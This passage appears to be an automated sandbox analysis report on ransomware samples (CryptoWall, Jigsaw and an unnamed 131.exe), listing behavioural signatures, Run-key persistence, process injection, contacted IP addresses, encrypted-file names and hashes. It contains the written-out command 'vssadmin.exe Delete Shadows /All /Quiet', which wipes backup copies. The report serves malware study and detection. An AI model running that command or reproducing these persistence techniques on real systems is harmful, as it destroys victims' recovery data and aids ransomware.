Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8b7a4d25.exe C:\Windows\syswow64\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\8b7a4d2 = "C:\\8b7a4d25\\8b7a4d25.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*b7a4d2 = "C:\\8b7a4d25\\8b7a4d25.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\8b7a4d25 = "C:\\Users\\Admin\\AppData\\Roaming\\8b7a4d25.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*b7a4d25 = "C:\\Users\\Admin\\AppData\\Roaming\\8b7a4d25.exe" C:\Windows\syswow64\explorer.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-addr.es N/A N/A
N/A myexternalip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2404 set thread context of 2444 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\syswow64\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
N/A N/A C:\Windows\syswow64\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2404 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2404 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2404 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2404 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2404 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2404 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2404 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2404 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2404 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2404 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2444 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2444 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2444 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2444 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2884 wrote to memory of 2772 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 2884 wrote to memory of 2772 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 2884 wrote to memory of 2772 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 2884 wrote to memory of 2772 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 2884 wrote to memory of 2968 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe
PID 2884 wrote to memory of 2968 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe
PID 2884 wrote to memory of 2968 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe
PID 2884 wrote to memory of 2968 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

C:\Windows\syswow64\explorer.exe

"C:\Windows\syswow64\explorer.exe"

C:\Windows\syswow64\svchost.exe

-k netsvcs

C:\Windows\syswow64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-addr.es udp
FR 188.165.164.184:80 ip-addr.es tcp
US 8.8.8.8:53 myexternalip.com udp
US 34.160.111.145:80 myexternalip.com tcp
FR 94.247.31.19:8080 tcp
US 209.148.85.151:8080 tcp
FR 91.121.12.127:4141 tcp
FR 94.247.28.26:2525 tcp
FR 94.247.28.156:8081 tcp
FR 188.165.164.184:80 ip-addr.es tcp
US 34.160.111.145:80 myexternalip.com tcp
FR 94.247.31.19:8080 tcp
US 209.148.85.151:8080 tcp

Files

memory/2444-13-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2444-11-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2404-10-0x0000000000230000-0x0000000000246000-memory.dmp

memory/2884-15-0x0000000000080000-0x00000000000A5000-memory.dmp

memory/2444-14-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2444-9-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2444-7-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2444-4-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2444-0-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2444-2-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2772-21-0x0000000000080000-0x00000000000A5000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20240903-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"

Signatures

Jigsaw Ransomware

ransomware jigsaw

Jigsaw family

jigsaw

Renames multiple (2029) files with added filename extension

ransomware

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\setting_back.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_right_over.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\RegisterHide.avi.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\gadget.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Gradient.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_ButtonGraphic.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoBeta.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.Xml.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMask.bmp C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\timeZones.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\js\slideShow.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\js\library.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ar.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\7-Zip\Lang\nb.txt.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\fr-FR\gadget.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_VideoInset.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_s.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\service.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\localizedStrings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_center.gif C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieResume.dotx C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\gadget.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\init.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\picturePuzzle.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\add_down.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 btc.blockr.io udp

Files

memory/2976-0-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp

memory/2976-1-0x0000000000270000-0x00000000002A8000-memory.dmp

memory/2976-2-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2976-3-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

MD5 2773e3dc59472296cb0024ba7715a64e
SHA1 27d99fbca067f478bb91cdbcb92f13a828b00859
SHA256 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7
SHA512 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262

memory/1632-11-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2976-10-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/1632-12-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/1632-13-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

C:\Users\Admin\Documents\SelectTrace.xlsx.fun

MD5 394e48e09c021dbb9d0d4c602fe282c0
SHA1 53f68b45f971cc6eebe8d55b0de646c160fca976
SHA256 924cb4f85f15f2f271d99120031bd24e0166109b94a2d02731e7858dc884d7af
SHA512 8ead2dfaa1ba5aeb46cf746690fb169be733cc873a3c041bb2291c4699ae58ce4c9dfb1a4aba93ff5f417ad8517fa5294541c54d8776dbd592d6aef5168f9c79

C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif.fun

MD5 580ee0344b7da2786da6a433a1e84893
SHA1 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e
SHA256 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513
SHA512 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\container.dat.fun

MD5 8ebcc5ca5ac09a09376801ecdd6f3792
SHA1 81187142b138e0245d5d0bc511f7c46c30df3e14
SHA256 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880
SHA512 cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650

memory/1632-2052-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/1632-2053-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/1632-2055-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/1632-2056-0x000000001C150000-0x000000001C1C2000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\131.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\131.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\131.exe

"C:\Users\Admin\AppData\Local\Temp\131.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 68.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

N/A